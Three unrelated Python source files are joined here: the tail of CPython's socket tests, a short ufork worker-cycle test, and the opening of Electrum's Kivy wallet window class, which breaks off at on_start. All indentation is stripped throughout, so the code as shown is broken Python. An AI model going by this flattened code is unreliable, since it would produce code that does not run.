ValueError, "SOCK_STREAM", meth, file)
with open(os_helper.TESTFN, encoding="utf-8") as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "binary mode", meth, file)
with open(os_helper.TESTFN, 'rb') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count='2')
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count=0.1)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=0)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=-1)
@unittest.skipUnless(hasattr(os, "sendfile"),
'os.sendfile() required for this test.')
class SendfileUsingSendfileTest(SendfileUsingSendTest):
"""
Test the sendfile() implementation of socket.sendfile().
"""
def meth_from_sock(self, sock):
return getattr(sock, "_sendfile_use_sendfile")
@unittest.skipUnless(HAVE_SOCKET_ALG, 'AF_ALG required')
class LinuxKernelCryptoAPI(unittest.TestCase):
# tests for AF_ALG
def create_alg(self, typ, name):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
try:
sock.bind((typ, name))
except FileNotFoundError as e:
# type / algorithm is not available
sock.close()
raise unittest.SkipTest(str(e), typ, name)
else:
return sock
    # bpo-31705: On kernels older than 4.5, sendto() failed with ENOKEY,
    # at least on the ppc64le architecture.
@support.requires_linux_version(4, 5)
def test_sha256(self):
expected = bytes.fromhex("ba7816bf8f01cfea414140de5dae2223b00361a396"
"177a9cb410ff61f20015ad")
with self.create_alg('hash', 'sha256') as algo:
op, _ = algo.accept()
with op:
op.sendall(b"abc")
self.assertEqual(op.recv(512), expected)
op, _ = algo.accept()
with op:
op.send(b'a', socket.MSG_MORE)
op.send(b'b', socket.MSG_MORE)
op.send(b'c', socket.MSG_MORE)
op.send(b'')
self.assertEqual(op.recv(512), expected)
def test_hmac_sha1(self):
expected = bytes.fromhex("effcdf6ae5eb2fa2d27416d5f184df9c259a7c79")
with self.create_alg('hash', 'hmac(sha1)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, b"Jefe")
op, _ = algo.accept()
with op:
op.sendall(b"what do ya want for nothing?")
self.assertEqual(op.recv(512), expected)
# Although it should work with 3.19 and newer the test blocks on
# Ubuntu 15.10 with Kernel 4.2.0-19.
@support.requires_linux_version(4, 3)
def test_aes_cbc(self):
key = bytes.fromhex('06a9214036b8a15b512e03d534120006')
iv = bytes.fromhex('3dafba429d9eb430b422da802c9fac41')
msg = b"Single block msg"
ciphertext = bytes.fromhex('e353779c1079aeb82708942dbe77181a')
msglen = len(msg)
with self.create_alg('skcipher', 'cbc(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
flags=socket.MSG_MORE)
op.sendall(msg)
self.assertEqual(op.recv(msglen), ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([ciphertext],
op=socket.ALG_OP_DECRYPT, iv=iv)
self.assertEqual(op.recv(msglen), msg)
# long message
multiplier = 1024
longmsg = [msg] * multiplier
op, _ = algo.accept()
with op:
op.sendmsg_afalg(longmsg,
op=socket.ALG_OP_ENCRYPT, iv=iv)
enc = op.recv(msglen * multiplier)
self.assertEqual(len(enc), msglen * multiplier)
self.assertEqual(enc[:msglen], ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([enc],
op=socket.ALG_OP_DECRYPT, iv=iv)
dec = op.recv(msglen * multiplier)
self.assertEqual(len(dec), msglen * multiplier)
self.assertEqual(dec, msg * multiplier)
@support.requires_linux_version(4, 9) # see issue29324
def test_aead_aes_gcm(self):
key = bytes.fromhex('c939cc13397c1d37de6ae0e1cb7c423c')
iv = bytes.fromhex('b3d8cc017cbb89b39e0f67e2')
plain = bytes.fromhex('c3b3c41f113a31b73d9a5cd432103069')
assoc = bytes.fromhex('24825602bd12a984e0092d3e448eda5f')
expected_ct = bytes.fromhex('93fe7d9e9bfd10348a5606e5cafa7354')
expected_tag = bytes.fromhex('0032a1dc85f1c9786925a2e71d8272dd')
taglen = len(expected_tag)
assoclen = len(assoc)
with self.create_alg('aead', 'gcm(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE,
None, taglen)
# send assoc, plain and tag buffer in separate steps
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen, flags=socket.MSG_MORE)
op.sendall(assoc, socket.MSG_MORE)
op.sendall(plain)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# now with msg
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg_afalg([msg], op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# create anc data manually
pack_uint32 = struct.Struct('I').pack
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg(
[msg],
([socket.SOL_ALG, socket.ALG_SET_OP, pack_uint32(socket.ALG_OP_ENCRYPT)],
[socket.SOL_ALG, socket.ALG_SET_IV, pack_uint32(len(iv)) + iv],
[socket.SOL_ALG, socket.ALG_SET_AEAD_ASSOCLEN, pack_uint32(assoclen)],
)
)
res = op.recv(len(msg) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# decrypt and verify
op, _ = algo.accept()
with op:
msg = assoc + expected_ct + expected_tag
op.sendmsg_afalg([msg], op=socket.ALG_OP_DECRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(len(msg) - taglen)
self.assertEqual(plain, res[assoclen:])
@support.requires_linux_version(4, 3) # see test_aes_cbc
def test_drbg_pr_sha256(self):
# deterministic random bit generator, prediction resistance, sha256
with self.create_alg('rng', 'drbg_pr_sha256') as algo:
extra_seed = os.urandom(32)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, extra_seed)
op, _ = algo.accept()
with op:
rn = op.recv(32)
self.assertEqual(len(rn), 32)
def test_sendmsg_afalg_args(self):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
with sock:
with self.assertRaises(TypeError):
sock.sendmsg_afalg()
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(1)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=-1)
def test_length_restriction(self):
# bpo-35050, off-by-one error in length check
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
self.addCleanup(sock.close)
# salg_type[14]
with self.assertRaises(FileNotFoundError):
sock.bind(("t" * 13, "name"))
with self.assertRaisesRegex(ValueError, "type too long"):
sock.bind(("t" * 14, "name"))
# salg_name[64]
with self.assertRaises(FileNotFoundError):
sock.bind(("type", "n" * 63))
with self.assertRaisesRegex(ValueError, "name too long"):
sock.bind(("type", "n" * 64))
@unittest.skipUnless(sys.platform.startswith("win"), "requires Windows")
class TestMSWindowsTCPFlags(unittest.TestCase):
knownTCPFlags = {
# available since a long time ago
'TCP_MAXSEG',
'TCP_NODELAY',
# available starting with Windows 10 1607
'TCP_FASTOPEN',
# available starting with Windows 10 1703
'TCP_KEEPCNT',
# available starting with Windows 10 1709
'TCP_KEEPIDLE',
'TCP_KEEPINTVL'
}
def test_new_tcp_flags(self):
provided = [s for s in dir(socket) if s.startswith('TCP')]
unknown = [s for s in provided if s not in self.knownTCPFlags]
self.assertEqual([], unknown,
"New TCP flags were discovered. See bpo-32394 for more information")
class CreateServerTest(unittest.TestCase):
def test_address(self):
port = socket_helper.find_unused_port()
with socket.create_server(("127.0.0.1", port)) as sock:
self.assertEqual(sock.getsockname()[0], "127.0.0.1")
self.assertEqual(sock.getsockname()[1], port)
if socket_helper.IPV6_ENABLED:
with socket.create_server(("::1", port),
family=socket.AF_INET6) as sock:
self.assertEqual(sock.getsockname()[0], "::1")
self.assertEqual(sock.getsockname()[1], port)
def test_family_and_type(self):
with socket.create_server(("127.0.0.1", 0)) as sock:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
if socket_helper.IPV6_ENABLED:
with socket.create_server(("::1", 0), family=socket.AF_INET6) as s:
self.assertEqual(s.family, socket.AF_INET6)
self.assertEqual(s.type, socket.SOCK_STREAM)
def test_reuse_port(self):
if not hasattr(socket, "SO_REUSEPORT"):
with self.assertRaises(ValueError):
socket.create_server(("localhost", 0), reuse_port=True)
else:
with socket.create_server(("localhost", 0)) as sock:
opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
self.assertEqual(opt, 0)
with socket.create_server(("localhost", 0), reuse_port=True) as sock:
opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
self.assertNotEqual(opt, 0)
@unittest.skipIf(not hasattr(_socket, 'IPPROTO_IPV6') or
not hasattr(_socket, 'IPV6_V6ONLY'),
"IPV6_V6ONLY option not supported")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test_ipv6_only_default(self):
with socket.create_server(("::1", 0), family=socket.AF_INET6) as sock:
assert sock.getsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY)
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test_dualstack_ipv6_family(self):
with socket.create_server(("::1", 0), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.assertEqual(sock.family, socket.AF_INET6)
class CreateServerFunctionalTest(unittest.TestCase):
timeout = support.LOOPBACK_TIMEOUT
def setUp(self):
self.thread = None
def tearDown(self):
if self.thread is not None:
self.thread.join(self.timeout)
def echo_server(self, sock):
def run(sock):
with sock:
conn, _ = sock.accept()
with conn:
event.wait(self.timeout)
msg = conn.recv(1024)
if not msg:
return
conn.sendall(msg)
event = threading.Event()
sock.settimeout(self.timeout)
self.thread = threading.Thread(target=run, args=(sock, ))
self.thread.start()
event.set()
def echo_client(self, addr, family):
with socket.socket(family=family) as sock:
sock.settimeout(self.timeout)
sock.connect(addr)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
def test_tcp4(self):
port = socket_helper.find_unused_port()
with socket.create_server(("", port)) as sock:
self.echo_server(sock)
self.echo_client(("127.0.0.1", port), socket.AF_INET)
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test_tcp6(self):
port = socket_helper.find_unused_port()
with socket.create_server(("", port),
family=socket.AF_INET6) as sock:
self.echo_server(sock)
self.echo_client(("::1", port), socket.AF_INET6)
# --- dual stack tests
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test_dual_stack_client_v4(self):
port = socket_helper.find_unused_port()
with socket.create_server(("", port), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.echo_server(sock)
self.echo_client(("127.0.0.1", port), socket.AF_INET)
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test_dual_stack_client_v6(self):
port = socket_helper.find_unused_port()
with socket.create_server(("", port), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.echo_server(sock)
self.echo_client(("::1", port), socket.AF_INET6)
@requireAttrs(socket, "send_fds")
@requireAttrs(socket, "recv_fds")
@requireAttrs(socket, "AF_UNIX")
class SendRecvFdsTests(unittest.TestCase):
def testSendAndRecvFds(self):
def close_pipes(pipes):
for fd1, fd2 in pipes:
os.close(fd1)
os.close(fd2)
def close_fds(fds):
for fd in fds:
os.close(fd)
# send 10 file descriptors
pipes = [os.pipe() for _ in range(10)]
self.addCleanup(close_pipes, pipes)
fds = [rfd for rfd, wfd in pipes]
# use a UNIX socket pair to exchange file descriptors locally
sock1, sock2 = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM)
with sock1, sock2:
socket.send_fds(sock1, [MSG], fds)
# request more data and file descriptors than expected
msg, fds2, flags, addr = socket.recv_fds(sock2, len(MSG) * 2, len(fds) * 2)
self.addCleanup(close_fds, fds2)
self.assertEqual(msg, MSG)
self.assertEqual(len(fds2), len(fds))
self.assertEqual(flags, 0)
# don't test addr
# test that file descriptors are connected
for index, fds in enumerate(pipes):
rfd, wfd = fds
os.write(wfd, str(index).encode())
for index, rfd in enumerate(fds2):
data = os.read(rfd, 100)
self.assertEqual(data, str(index).encode())
def test_main():
tests = [GeneralModuleTests, BasicTCPTest, TCPCloserTest, TCPTimeoutTest,
TestExceptions, BufferIOTest, BasicTCPTest2, BasicUDPTest,
UDPTimeoutTest, CreateServerTest, CreateServerFunctionalTest,
SendRecvFdsTests]
tests.extend([
NonBlockingTCPTests,
FileObjectClassTestCase,
UnbufferedFileObjectClassTestCase,
LineBufferedFileObjectClassTestCase,
SmallBufferedFileObjectClassTestCase,
UnicodeReadFileObjectClassTestCase,
UnicodeWriteFileObjectClassTestCase,
UnicodeReadWriteFileObjectClassTestCase,
NetworkConnectionNoServer,
NetworkConnectionAttributesTest,
NetworkConnectionBehaviourTest,
ContextManagersTest,
InheritanceTest,
NonblockConstantTest
])
tests.append(BasicSocketPairTest)
tests.append(TestUnixDomain)
tests.append(TestLinuxAbstractNamespace)
tests.extend([TIPCTest, TIPCThreadableTest])
tests.extend([BasicCANTest, CANTest])
tests.extend([BasicRDSTest, RDSTest])
tests.append(LinuxKernelCryptoAPI)
tests.append(BasicQIPCRTRTest)
tests.extend([
BasicVSOCKTest,
ThreadedVSOCKSocketStreamTest,
])
tests.append(BasicBluetoothTest)
tests.extend([
CmsgMacroTests,
SendmsgUDPTest,
RecvmsgUDPTest,
RecvmsgIntoUDPTest,
SendmsgUDP6Test,
RecvmsgUDP6Test,
RecvmsgRFC3542AncillaryUDP6Test,
RecvmsgIntoRFC3542AncillaryUDP6Test,
RecvmsgIntoUDP6Test,
SendmsgUDPLITETest,
RecvmsgUDPLITETest,
RecvmsgIntoUDPLITETest,
SendmsgUDPLITE6Test,
RecvmsgUDPLITE6Test,
RecvmsgRFC3542AncillaryUDPLITE6Test,
RecvmsgIntoRFC3542AncillaryUDPLITE6Test,
RecvmsgIntoUDPLITE6Test,
SendmsgTCPTest,
RecvmsgTCPTest,
RecvmsgIntoTCPTest,
SendmsgSCTPStreamTest,
RecvmsgSCTPStreamTest,
RecvmsgIntoSCTPStreamTest,
SendmsgUnixStreamTest,
RecvmsgUnixStreamTest,
RecvmsgIntoUnixStreamTest,
RecvmsgSCMRightsStreamTest,
RecvmsgIntoSCMRightsStreamTest,
# These are slow when setitimer() is not available
InterruptedRecvTimeoutTest,
InterruptedSendTimeoutTest,
TestSocketSharing,
SendfileUsingSendTest,
SendfileUsingSendfileTest,
])
tests.append(TestMSWindowsTCPFlags)
thread_info = threading_helper.threading_setup()
support.run_unittest(*tests)
threading_helper.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
test_worker.py
|
from __future__ import absolute_import
import sys
import time
import threading
try:
import _thread as thread
except ImportError:
import thread # py3
from tests.utils import check_leaked_workers
from ufork import Arbiter
def suicide_worker():
def die_soon():
time.sleep(2)
thread.interrupt_main() # sys.exit(0)
suicide_thread = threading.Thread(target=die_soon)
suicide_thread.daemon = True
suicide_thread.start()
def test_worker_cycle_test():
arbiter = Arbiter(post_fork=suicide_worker)
arbiter_thread = threading.Thread(target=arbiter.run, kwargs={"repl": False})
arbiter_thread.daemon = True
arbiter_thread.start()
time.sleep(6) # give some time for workers to die
arbiter.stopping = True
arbiter_thread.join()
time.sleep(1) # give OS a chance to finish killing all child workers
assert arbiter.dead_workers
check_leaked_workers(arbiter)
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
from electrum.bitcoin import TYPE_ADDRESS
from electrum.storage import WalletStorage
from electrum.wallet import Wallet, InternalAddressCorruption
from electrum.paymentrequest import InvoiceStore
from electrum.util import profiler, InvalidPassword, send_exception_to_crash_reporter
from electrum.plugin import run_hook
from electrum.util import format_satoshis, format_satoshis_plain
from electrum.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from electrum import blockchain
from electrum.network import Network
from .i18n import _
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register widget cache for keeping memory down; timeout is set to forever so
# the data stays cached
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum.gui.kivy.uix.screens')
# Register fonts; without this you won't be able to use bold/italic inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import (base_units, NoDynamicFeeEstimates, decimal_point_to_base_unit_name,
base_unit_name_to_decimal_point, NotEnoughFunds, UnknownBaseUnit,
DECIMAL_POINT_DEFAULT)
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum import constants
pp = servers.get(host, constants.net.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'bitcoin':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def _get_bu(self):
decimal_point = self.electrum_config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
return decimal_point_to_base_unit_name(decimal_point)
except UnknownBaseUnit:
return decimal_point_to_base_unit_name(DECIMAL_POINT_DEFAULT)
def _set_bu(self, value):
assert value in base_units.keys()
decimal_point = base_unit_name_to_decimal_point(value)
self.electrum_config.set_key('decimal_point', decimal_point, True)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
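# Illustrative conversion sketch (the numbers below are assumptions, not values
# taken from this file): with base_unit 'BTC' and an exchange rate of 10000,
# btc_to_fiat('0.5') computes 50_000_000 sat * 10000 / 1e8 = 5000.0 and returns
# '5000'; fiat_to_btc('5000') inverts this back to '0.5'.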
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''The current screen orientation.
Can be one of `landscape` or `portrait`.
:data:`orientation` is a read-only `AliasProperty`. Defaults to 'landscape'.
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Tries to ascertain the kind of device the app is running on.
Can be one of `tablet` or `phone`.
:data:`ui_mode` is a read-only `AliasProperty`. Defaults to 'phone'.
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
self.pause_time = 0
App.__init__(self)#, **kwargs)
title = _('Electrum App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.host
self.server_port = net_params.port
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so that updates happen at most twice per second
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
def on_pr(self, pr):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('bitcoin:'):
self.set_URI(data)
return
# try to decode transaction
from electrum.transaction import Transaction
from electrum.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrum.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
fund = req.get('fund')
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
popup.fund = fund if fund else 0
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.export = self.export_private_keys
popup.open()
def show_addr_details(self, req, status):
from electrum.util import format_time
fund = req.get('fund')
isaddr = 'y'
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/invoice.kv')
popup.isaddr = isaddr
popup.is_invoice = False
popup.status = status
popup.requestor = req.get('address')
popup.fund = fund if fund else 0
popup.export = self.export_private_keys
popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(title, data, show_text, on_qr_failure)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('electrum/gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
